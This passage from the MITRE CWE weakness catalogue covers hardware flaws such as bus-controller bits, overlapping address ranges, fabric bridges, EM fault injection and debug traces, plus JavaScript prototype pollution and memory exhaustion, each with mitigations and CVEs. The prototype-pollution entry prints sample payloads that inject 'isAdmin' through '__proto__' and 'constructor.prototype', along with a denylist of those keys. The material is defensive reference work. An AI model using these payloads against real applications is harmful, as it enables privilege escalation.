controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. + + + System Configuration + For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. + + + + + A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit ("PMIC"), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals. + The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0. There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders. + Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security. + Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers. + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna + Intel Corporation + 2020-05-19 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region. + + Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected. + Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Authorization + Bypass Protection Mechanism + Read Memory + Modify Memory + Medium + + + + + Automated Dynamic Analysis + Review address map in specification to see if there are any overlapping ranges. + High + + + Manual Static Analysis + Negative testing of access control on overlapped ranges. + High + + + + + Architecture and Design + When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap. + + + Implementation + Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion. + + + Testing + Validate mitigation actions with robust testing. + + + + + An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB. Registers and other assets that are not security-sensitive require 40KB. One range register is configured to program 4KB to protect user A's assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B's assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range. + The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data. + Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space. Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data. + + + + + CVE-2009-4419 + Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched. + https://www.cve.org/CVERecord?id=CVE-2009-4419 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-06-01 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a fabric bridge for transactions between two Intellectual Property (IP) blocks, but the bridge does not properly perform the expected privilege, identity, or other access control checks between those IP blocks. + + In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect. + For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Availability + DoS: Crash, Exit, or Restart + Bypass Protection Mechanism + Read Memory + Modify Memory + Medium + + + + + Simulation / Emulation + RTL simulation to ensure that bridge-access controls are implemented properly. + High + + + Formal Verification + Formal verification of bridge RTL to ensure that access control cannot be bypassed. + High + + + + + Architecture and Design + Ensure that the design includes provisions for access-control checks in the bridge for both upstream and downstream transactions. + + + Implementation + Implement access-control checks in the bridge for both upstream and downstream transactions. + + + + + This example is from CVE-2019-6260 [REF-1138]. The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus. + The bridge does not implement the checks and allows reads and writes from all privilege levels. + To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes. + + + + + CVE-2019-6260 + Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. + https://www.cve.org/CVERecord?id=CVE-2019-6260 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-05-19 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Security Checks in Fabric Bridge + + + + On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control. + + Certain on-chip fabrics and buses, especially simple and low-power buses, do not support security features. Apart from data transfer and addressing ports, some fabrics and buses do not have any interfaces to transfer privilege, immutable identity, or any other security attribute coming from the bus master. Similarly, they do not have dedicated signals to transport security-sensitive data from slave to master, such as completions for certain types of transactions. Few other on-chip fabrics and buses support security features and define specific interfaces/signals for transporting security attributes from master to slave or vice-versa. However, including these signals is not mandatory and could be left unconfigured when generating the register-transfer-level (RTL) description for the fabric. Such fabrics or buses should not be used to transport any security attribute coming from the bus master. In general, peripherals with security assets should not be connected to such buses before the transaction from the bus master reaches the bus, unless some form of access control is performed at a fabric bridge or another intermediate module. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Availability + DoS: Crash, Exit, or Restart + Read Memory + Modify Memory + Medium + + + + + Architecture or Design Review + Review the fabric specification and ensure that it contains signals to transfer security-sensitive signals. + High + + + Manual Static Analysis - Source Code + Lack of security features can also be confirmed through manual RTL review of the fabric RTL. + High + + + + + Architecture and Design + If fabric does not support security features, implement security checks in a bridge or any component that is between the master and the fabric. Alternatively, connect all fabric slaves that do not have any security assets under one such fabric and connect peripherals with security assets to a different fabric that supports security features. + + + + + + Several systems on chips (SoCs) use the Advanced-Microcontroller Bus Architecture (AMBA) Advanced-Peripheral Bus (APB) protocol. APB is a simple, low-power bus and uses the PPROT[2:0] bits to indicate the security state of the bus masters ;PPROT[0] indicates privilege, PPROT[1] indicates secure/non-secure transaction, and PPROT[2] indicates instruction/data. Assume that there is no fabric bridge in the SoC. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits. + The APB bus is used to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. For a CPU supporting 8 potential identities (each with varying privilege levels), 16 types of outgoing transactions can be made--8 read transactions with each supported privilege level and 8 write transactions with each supported privilege level. + Since APB PPROT can only support up to 8 transaction types, access-control checks cannot be performed on transactions going to the slaves at the right granularity for all possible transaction types. Thus, potentially, user code running on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device, resulting in permanent denial of service. + In this scenario, only peripherals that need access protection from 8 of the 16 possible transaction types can be connected to the APB bus. Peripherals that require protection from the remaining 8 transaction types can be connected to a different APB bus. Alternatively, a bridge could be implemented to handle such complex scenarios before forwarding traffic to the APB bus. + + + The Open-Core-Protocol (OCP) fabric supports two configurable, width-optional signals for transporting security attributes: MReqInfo and SRespInfo. MReqInfo is used to transport security attributes from bus master to slave, and SRespInfo is used to transport security attributes from slave to bus master. An SoC uses OCP to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. One of the bus masters, the CPU, reports the privilege level (user or super user) in addition to the unique identity. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits. + Since MReqInfo and SRespInfo are not mandatory, these signals are not configured when autogenerating RTL for the OCP fabric. Thus, the fabric cannot be used to transport security attributes from bus masters to slave. + Code running at user-privilege level on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device and cause permanent denial of service. + To address this, configure the fabric to include MReqInfo and SRespInfo signals and use these to transport security identity and privilege level to perform access-control checks at the slave interface. + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-05-20 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed. + + Electromagnetic fault injection may allow an attacker to locally and dynamically modify the signals (both internal and external) of an integrated circuit. EM-FI attacks consist of producing a local, transient magnetic field near the device, inducing current in the device wires. A typical EMFI setup is made up of a pulse injection circuit that generates a high current transient in an EMI coil, producing an abrupt magnetic pulse which couples to the target producing faults in the device, which can lead to: + + Bypassing security mechanisms such as secure JTAG or Secure Boot + Leaking device information + Modifying program flow + Perturbing secure hardware modules (e.g. random number generators) + + + + + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Availability + Modify Memory + Read Memory + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Execute Unauthorized Code or Commands + + + + + Architecture and Design + Implementation + + + 1. Redundancy - By replicating critical operations and comparing the two outputs can help indicate whether a fault has been injected. + 2. Error detection and correction codes - Gay, Mael, et al. proposed a new scheme that not only detects faults injected by a malicious adversary but also automatically corrects single nibble/byte errors introduced by low-multiplicity faults. + 3. Fail by default coding - When checking conditions (switch or if) check all possible cases and fail by default because the default case in a switch (or the else part of a cascaded if-else-if construct) is used for dealing with the last possible (and valid) value without checking. This is prone to fault injection because this alternative is easily selected as a result of potential data manipulation [REF-1141]. + 4. Random Behavior - adding random delays before critical operations, so that timing is not predictable. + 5. Program Flow Integrity Protection - The program flow can be secured by integrating run-time checking aiming at detecting control flow inconsistencies. One such example is tagging the source code to indicate the points not to be bypassed [REF-1147]. + 6. Sensors - Usage of sensors can detect variations in voltage and current. + 7. Shields - physical barriers to protect the chips from malicious manipulation. + + + + + + + In many devices, security related information is stored in fuses. These fuses are loaded into shadow registers at boot time. Disturbing this transfer phase with EM-FI can lead to the shadow registers storing erroneous values potentially resulting in reduced security. + Colin O'Flynn has demonstrated an attack scenario which uses electro-magnetic glitching during booting to bypass security and gain read access to flash, read and erase access to shadow memory area (where the private password is stored). Most devices in the MPC55xx and MPC56xx series that include the Boot Assist Module (BAM) (a serial or CAN bootloader mode) are susceptible to this attack. In this paper, a GM ECU was used as a real life target. While the success rate appears low (less than 2 percent), in practice a success can be found within 1-5 minutes once the EMFI tool is setup. In a practical scenario, the author showed that success can be achieved within 30-60 minutes from a cold start. + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is attack-oriented and may require significant modification in future versions, or even deprecation. It is not clear whether there is really a design "mistake" that enables such attacks, so this is not necessarily a weakness and may be more appropriate for CAPEC. + + + + Sebastien Leger, Rohini Narasipur + Bosch + 2020-08-27 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated because it was a duplicate of CWE-170. All content has been transferred to CWE-170. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Miscalculated Null Termination + DEPRECATED (Duplicate): Miscalculated Null Termination + + + + Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts. + + + Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS. + Modification of these limits may be protected by hardware mechanisms. + When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling. + Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS). + These alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts. + + + + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Instability + DoS: Crash, Exit, or Restart + Reduce Reliability + Unexpected State + High + + + + + Architecture and Design + Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration. + + + + + + Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value. + If the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor. + The processor, upon getting the alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode. + + The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin. + Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor. + The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS. + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna + Intel Corporation + 2020-05-29 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Protection for Out of Bounds Signal Level Alerts + + + + The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. + + By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the product depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). + This weakness is usually exploited by using a special attribute of objects called proto, constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Modify Application Data + High + An attacker can inject attributes that are used in other components. + + + Availability + DoS: Crash, Exit, or Restart + High + An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash. + + + + + Implementation + By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible. + High + While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software ("libraries"). + + + Architecture and Design + By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated. + High + + + Implementation + Input Validation + When handling untrusted objects, validating using a schema can be used. + Limited + + + Implementation + By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness. + High + + + Implementation + Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it. + Moderate + + + + + This function sets object attributes based on a dot-separated path. + + + function setValueByPath (object, path, value) { + + const pathArray = path.split("."); + const attributeToSet = pathArray.pop(); + let objectToModify = object; + for (const attr of pathArray) { + if (typeof objectToModify[attr] !== 'object') { + objectToModify[attr] = {}; + } + objectToModify = objectToModify[attr]; + } + objectToModify[attributeToSet] = value; + return object; + } + + + + This function does not check if the attribute resolves to the object prototype. These codes can be used to add "isAdmin: true" to the object prototype. + + + setValueByPath({}, "__proto__.isAdmin", true) + setValueByPath({}, "constructor.prototype.isAdmin", true) + + + By using a denylist of dangerous attributes, this weakness can be eliminated. + + + function setValueByPath (object, path, value) { + + const pathArray = path.split("."); + const attributeToSet = pathArray.pop(); + let objectToModify = object; + for (const attr of pathArray) { + + // Ignore attributes which resolve to object prototype + if (attr === "__proto__" || attr === "constructor" || attr === "prototype") { + + continue; + } + + if (typeof objectToModify[attr] !== "object") { + + objectToModify[attr] = {}; + } + + objectToModify = objectToModify[attr]; + } + + objectToModify[attributeToSet] = value; + return object; + } + + + + + + + + CVE-2018-3721 + Prototype pollution by merging objects. + https://www.cve.org/CVERecord?id=CVE-2018-3721 + + + CVE-2019-10744 + Prototype pollution by setting default values to object attributes recursively. + https://www.cve.org/CVERecord?id=CVE-2019-10744 + + + CVE-2019-11358 + Prototype pollution by merging objects recursively. + https://www.cve.org/CVERecord?id=CVE-2019-11358 + + + CVE-2020-8203 + Prototype pollution by setting object attributes based on dot-separated path. + https://www.cve.org/CVERecord?id=CVE-2020-8203 + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous External Contributor + 2020-08-25 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + + The product uses a non-blocking model that relies on a single threaded process + for features such as scalability, but it contains code that can block when it is invoked. + + When an attacker can directly invoke the blocking code, or the blocking code can be affected by environmental conditions that can be influenced by an attacker, then this can lead to a denial of service by causing unexpected hang or freeze of the code. Examples of blocking code might be an expensive computation or calling + blocking library calls, such as those that perform exclusive file operations or require a successful network operation. + Due to limitations in multi-thread models, single-threaded + models are used to overcome the resource constraints that are caused by using + many threads. In such a model, all code should generally be + non-blocking. If blocking code is called, then the event loop will + effectively be stopped, which can be undesirable or dangerous. Such + models are used in Python asyncio, Vert.x, and Node.js, or other + custom event loop code. + + + + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (CPU) + An unexpected call to blocking code can trigger an infinite loop, or a large loop that causes the software to pause and wait indefinitely. + + + + + Implementation + Generally speaking, blocking calls should be + replaced with non-blocking alternatives that can be used asynchronously. + Expensive computations should be passed off to worker threads, although + the correct approach depends on the framework being used. + + + Implementation + For expensive computations, consider breaking them up into + multiple smaller computations. Refer to the documentation of the + framework being used for guidance. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Joe Harvey + 2019-10-25 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Trace data collected from several sources on the + System-on-Chip (SoC) is stored in unprotected locations or + transported to untrusted agents. + + To facilitate verification of complex System-on-Chip + (SoC) designs, SoC integrators add specific IP blocks that + trace the SoC's internal signals in real-time. This + infrastructure enables observability of the SoC's internal + behavior, validation of its functional design, + and detection of hardware and software bugs. Such tracing + IP blocks collect traces from several sources on the SoC + including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then + aggregated inside trace IP block and forwarded to trace + sinks, such as debug-trace ports that facilitate debugging by + external hardware and software debuggers. + Since + these traces are collected from several security-sensitive + sources, they must be protected against untrusted + debuggers. If they are stored in unprotected memory, an + untrusted software debugger can access these traces and + extract secret information. Additionally, if + security-sensitive traces are not tagged as secure, an + untrusted hardware debugger might access them to extract + confidential information. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Memory + An adversary can read secret values if they are captured in debug traces and stored unsafely. + + + + + Implementation + Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace. + + + + + In a SoC, traces generated from sources + include security-sensitive IP blocks such as CPU (with + tracing information such as instructions executed and + memory operands), on-chip fabric (e.g., memory-transfer + signals, transaction type and destination, and + on-chip-firewall-error signals), power-management + IP blocks (e.g., clock- and power-gating signals), and + cryptographic coprocessors (e.g., cryptographic keys and + intermediate values of crypto operations), among + other non-security-sensitive IP blocks including timers + and other functional blocks. The collected traces are + then forwarded to the debug and trace interface used by + the external hardware debugger. + The traces do + not have any privilege level attached to them. All + collected traces can be viewed by any debugger (i.e., SoC + designer, OEM debugger, or end user). + Some of the + traces are SoC-design-house secrets, while some are OEM + secrets. Few are end-user secrets and the rest are + not security-sensitive. Tag all traces with the + appropriate, privilege level at the source. The bits + indicating the privilege level must be immutable in + their transit from trace source to the final, trace + sink. Debugger privilege level must be checked before + providing access to traces. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi + The Intel Corporation + 2020-07-20 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Common_Consequences + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated because it was at a lower level of abstraction than supported by CWE. All relevant content has been integrated into CWE-319. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Accellera IP Security Assurance (IPSA) Working Group + Accellera Systems Initiative + 2020-10-01 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-10-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sensitive Information Accessible by Physical Probing of JTAG Interface + + + + The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects. + + While the product might limit the amount of memory that is allocated in a single operation for a single object (such as a malloc of an array), if an attacker can cause multiple objects to be allocated in separate operations, then this might cause higher total memory consumption than the developer intended, leading to a denial of service. + + + + + + + + + Primary + + + + + + + + + + Stack Exhaustion + When a weakness allocates excessive memory on the stack, it is often described as "stack exhaustion," which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325. + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (Memory) + Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system. + + + + + Implementation + Ensure multiple allocations of the same kind of object are properly tracked - possibly across multiple sessions, requests, or messages. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary. + + + Operation + Run the program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized. + + + + + This example contains a small allocation of stack memory. When the program was first constructed, the number of times this memory was allocated was probably inconsequential and presented no problem. Over time, as the number of objects in the database grow, the number of allocations will grow - eventually consuming the available stack, i.e. "stack exhaustion." An attacker who is able to add elements to the database could cause stack exhaustion more rapidly than assumed by the developer. + + + // Gets the size from the number of objects in a database, which over time can conceivably get very large + int end_limit = get_nmbr_obj_from_db(); + int i; + int *base = NULL; + int *p =base; + for (i = 0; i < end_limit; i++) + { + + *p = alloca(sizeof(int *)); // Allocate memory on the stack + p = *p; // // Point to the next location to be saved + + } + + + Since this uses alloca(), it allocates memory directly on the stack. If end_limit is large enough, then the stack can be entirely consumed. + + + + + CVE-2020-36049 + JavaScript-based packet decoder uses concatenation of many small strings, causing out-of-memory (OOM) condition + https://www.cve.org/CVERecord?id=CVE-2020-36049 + + + CVE-2019-20176 + Product allocates a new buffer on the stack for each file in a directory, allowing stack exhaustion + https://www.cve.org/CVERecord?id=CVE-2019-20176 + + + CVE-2013-1591 + Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. + https://www.cve.org/CVERecord?id=CVE-2013-1591 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2020-12-07 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code. + + A System-on-Chip (SoC) implements secure boot by verifying or authenticating signed boot code. The signing of the code is achieved by an entity that the SoC trusts. Before executing the boot code, the SoC verifies that the code or the public key with which the code has been signed has not been tampered with. The other data upon which the SoC depends are system-hardware settings in fuses such as whether "Secure Boot is enabled". These data play a crucial role in establishing a Root of Trust (RoT) to execute 